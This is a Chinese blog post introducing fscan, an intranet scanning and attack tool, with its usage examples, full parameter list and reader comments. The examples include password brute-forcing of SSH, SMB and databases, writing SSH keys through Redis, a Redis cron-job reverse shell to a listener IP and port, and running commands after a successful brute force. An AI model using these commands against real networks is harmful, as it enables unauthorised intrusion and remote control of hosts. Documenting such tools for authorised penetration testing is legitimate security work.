大家好,感谢邀请,今天来为大家分享一下分享一个快速简单的内网安全漏洞扫描工具fscan的问题,以及和的一些困惑,大家要是还不太明白的话,也没有关系,因为接下来将为大家分享,希望可以帮助到大家,解决大家的问题,下面就开始吧!
根据该软件官方的说法,该工具支持主机生存检测、端口扫描、常用服务爆破、ms17010、redis批量公钥写入、定时任务反弹shell、读取win网卡信息、网页指纹识别、网页漏洞扫描、 netbios检测、域控识别等功能
主要功能
1.信息收集:
生存检测(icmp)端口扫描2.爆破功能:
各种服务爆破(ssh、smb等) 数据库密码爆破(mysql、mssql、redis、psql等) 3.系统信息、漏洞扫描:
Netbios检测、域控识别、目标网卡信息获取、高危漏洞扫描(ms17010等) 4、Web检测功能:
webtitle检测网页指纹(常见cms、oa框架等)网页漏洞扫描(weblogic、st2等,支持xray POC) 5、漏洞利用:
Redis写入公钥或者写入定时任务ssh命令执行6.其他功能:
有文件保存经验的人可以自行编译。像我们这样的普通人只需下载编译好的工具即可使用。下载地址在最后。
使用比较简单,命令行运行即可
简单用法
fscan.exe -h 192.168.1.1/24(默认使用所有模块) fscan.exe -h 192.168.1.1/16(B 段扫描)
其他用法
fscan.exe -h 192.168.1.1/24 – np – no -nopoc (跳过生存检测,不保存文件,跳过web poc扫描) fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis写入公钥) fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666(redis定时任务反弹shell) fscan.exe -h 192.168.1.1/24 -c whoami(ssh爆破成功后执行命令) fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口) fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名和密码进行爆破) fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) fscan.exe -h 192.168.1.1/8 (192.x.x.1 和192.x.x.254 A网段,方便快速查看网段信息) fscan.exe -h 192.168.1.1/24 -m smb -pwd 密码(smb密码冲突) fscan.exe -h 192.168.1.1/24 -m ms17010(指定模块) fscan.exe -hf ip.txt (with File import)
完整参数
-c stringssh 命令执行-cookie string set cookie-debug int 长时间无响应后,打印当前进度(默认60) -domain stringsmb 爆破时模块,设置域名-h string target ip: 192.168.11.11 | 192.168 .11.11-255 | 192.168.11.11,192.168.11.12 -hf 字符串读取文件中的目标-hn 字符串扫描时跳过,ip: -hn 192.168.1.1/24 -m 字符串设置扫描模式: -m ssh (默认’all’) – no 扫描结果不保存到文件-nobr 跳过sql、ftp、ssh 等密码爆破-nopoc 跳过web poc 扫描-np 跳过生存检测-num intweb poc 数据包发送速率(默认20) -o string 去向保存扫描结果(默认’result.txt’) -p string 设置扫描端口: 22 | 1-65535 | 22,80,3306 (默认’21,22,80,81,135,139,443,445,1433,3306, 5432,6379,7001,8000,8080,8089,9000,9200,11211,27017′) -pa 字符串添加需要的新端口待扫描, -pa 3389 (会在原有端口列表的基础上添加端口) -path stringfcgi,smb 远程文件路径-ping 使用ping 代替icmp 进行存活检测-pn string 扫描时要跳过的端口,as: -pn 445 -pocname string 指定web poc的模糊名称, -pocname weblogic-proxy string 设置代理, – proxy http://127.0.0.1:8080 -user string 指定爆破时的用户名-userf string 指定爆破时的用户名文件- pwd string 指定爆破时的密码-pwdf string 指定爆破时的密码文件-rf string 指定redis写入公钥文件的模块(as: -rf id_rsa.pub) -rs stringredis定时任务反弹shell ip端口(as: – rs 192.168.1.1:6666) -silent 静默扫描,适合cs扫描,无回显-sshkey stringssh 连接,指定ssh私钥-t int 扫描线程(默认600) -time int 端口扫描超时(默认3) -u string 指定Url扫描-uf string 指定Url文件扫描-wt intweb 访问超时时间(默认5) 测试截图:
原创文章,作者:小su,如若转载,请注明出处:https://www.sudun.com/ask/164513.html
用户评论
孤廖
终于找到一个既快速又好用的内网安全漏洞扫描工具!这款fscan真的太赞了,界面简单易用,扫描速度也很快,对于一些入门的朋友来说非常友好。我已经使用它扫描了一些我的设备,发现了几个需要注意的漏洞,现在正在进行修复。感谢分享!
有18位网友表示赞同!
优雅的叶子
我一直在找一款内网安全漏洞扫描工具,希望功能强大但不需要太复杂的学习成本。这款fscan看着不错的样子,我会下载试一试,看看能不能满足我的需求。你们有没有哪个漏洞扫描工具比较推荐呢?
有11位网友表示赞同!
眉黛如画
看了标题就很有兴趣,内网安全越来越重要了,这款fscan可以帮你快速扫描漏洞,这听起来很方便啊!我也要试试看效果如何,期待能帮助我更全面地保护自己的网络安全。
有13位网友表示赞同!
别伤我i
说它快捷简单,看起来还是很吸引人的,不过能不能保证准确率呢?很多开源的安全扫描工具都存在这个问题,导致误报情况比较多。希望这款fscan能够更好地解决这个问题!
有15位网友表示赞同!
我就是这样一个人
我是一个经验丰富的安全从业者,对这类漏洞扫描工具已经比较熟悉了。这款fscan虽然看起来简单易用,但我怀疑它可能缺乏了一些功能和深度分析能力,可能不适合更高端的网络安全评估需求。
有19位网友表示赞同!
命里缺他
一款可以快速扫描内网安全的工具确实很实用了,特别是对于那些对安全概念不太熟悉的用户来说,能够及时发现潜在的漏洞,还能帮助他们提高网络安全的意识。这个想法我很赞同!
有20位网友表示赞同!
全网暗恋者
我一直在寻找一种能够快速、有效地识别内部网络中的安全漏洞的方法。这款fscan听起来很不错,可以让我在有限的时间内扫描我的整个网络体系,并及时处理任何潜在威胁。
有16位网友表示赞同!
逾期不候
我已经使用过许多的安全扫描工具,但大多数都过于复杂,需要过多的配置和专业知识才能操作。我希望这款fscan能够真正像它的描述一样简单易用,即使是普通人也能轻松上手。
有18位网友表示赞同!
终究会走-
我有点担心这款fscan是否安全可靠?在内网环境下使用任何软件都需要谨慎评估其安全性,避免造成意外的漏洞或数据泄露。希望作者能提供更多关于工具本身安全的详细信息。
有16位网友表示赞同!
|赤;焰﹏゛
如果这款fscan能够支持多平台的使用,并且可以在 Linux 系统上运行,那将非常棒!我相信很多开发人员和安全分析师都更加倾向于使用 Linux 环境。
有14位网友表示赞同!
墨城烟柳
分享一款简洁的安全漏洞扫描器真是太棒了!内网安全一直是我的痛点,这款工具或许能帮助我更好地防护我的网络系统,避免一些常见的攻击方式。感谢作者的分享!
有14位网友表示赞同!
桃洛憬
这款fscan听起来很不错,但我想知道它支持哪些类型的漏洞扫描?比如 WEB 扫描、SQL 注入扫描、代码执行漏洞等等,希望你能详细介绍一下它的功能范围。
有13位网友表示赞同!
灼痛
我对内网安全一直比较关注,但是时间有限。这款快速、简易的fscan工具听起来很吸引人,可以帮助我更好地管理网络安全风险,节省我的宝贵时间!
有14位网友表示赞同!
陌離
希望这篇文章能详细介绍一下这款fscan的使用方法,以及一些常见的问题和解决方案。像使用扫描范围自定义、结果报告导出等等的功能,希望能得到更多的说明。
有6位网友表示赞同!
孤败
对于新手来说,也许更需要易于理解的教程或指南,而不是单纯的工具分享。作者能否提供一些入门级的安全配置建议以及关于fscan的使用场景案例?
有19位网友表示赞同!
我怕疼别碰我伤口
这款工具只能扫描基本的漏洞吗?复杂的网络环境中可能存在着更深层的安全威胁, fsacan 能否帮助我识别这些潜在漏洞?
有8位网友表示赞同!
煮酒
内网安全是一件很重要的事情,而且越来越多人关注这个问题。一款快捷、简单的扫描工具能够帮助很多人快速进行安全评估,这是一个非常好的趋势!希望这款fscan能够得到更多人的使用和推广。
有13位网友表示赞同!